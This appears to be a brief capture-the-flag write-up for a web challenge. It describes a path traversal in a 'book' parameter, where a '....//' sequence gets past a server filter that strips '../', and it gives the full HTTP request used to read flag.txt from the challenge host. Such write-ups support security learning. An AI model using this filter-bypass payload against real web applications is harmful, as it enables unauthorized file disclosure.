The book retrieval function is vulnerable to path traversal attack to retrive flag.txt at the root folder
Since ../ sequence is removed by the server, inject ….// so that it will be filtered out into ../
GET /library/?book=....//flag.txt HTTP/1.1
Host: curtinctfmy-adventures-of-harald1.chals.io
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
X-Pwnfox-Color: cyan
Priority: u=0, i
Te: trailers
Connection: keep-alive